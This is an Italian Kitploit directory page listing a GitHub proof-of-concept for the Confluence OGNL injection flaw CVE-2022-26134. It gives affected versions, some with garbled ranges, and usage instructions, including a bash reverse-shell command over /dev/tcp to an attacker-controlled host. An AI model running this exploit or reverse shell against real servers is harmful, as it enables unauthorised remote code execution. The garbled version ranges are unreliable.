Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-26134 — Un attaccante remoto, senza autenticazione su Confluence, può iniettare espressioni OGNL costruite ad hoc per eseguire codice arbitrario su Confluence Server o Data Center. Il PoC è stato modificato rispetto allo script esistente per facilitare l'ottenimento di una shell. | Kitploit
Strumenti/GitHubGitHub/keven1z/cve-2022-26134
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and Control
GitHubkeven1z/cve-2022-26134

CVE-2022-26134

Un attaccante remoto, senza autenticazione su Confluence, può iniettare espressioni OGNL costruite ad hoc per eseguire codice arbitrario su Confluence Server o Data Center. Il PoC è stato modificato rispetto allo script esistente per facilitare l'ottenimento di una shell.

Vedi Repository
724 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-26134

Un attaccante remoto non autenticato può costruire espressioni OGNL per iniettare ed eseguire codice arbitrario su Confluence Server o Data Center, modificare il PoC per ottenere facilmente una shell. Porta comune: 8090

Versioni interessate

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

Istruzioni per l'uso

root@kitploit:~
pip3 install requests
root@kitploit:~
	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

Utilizzo

root@kitploit:~
python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令

Questo script è destinato solo a scopi di test, non utilizzarlo per altri scopi.

Scarica lo strumento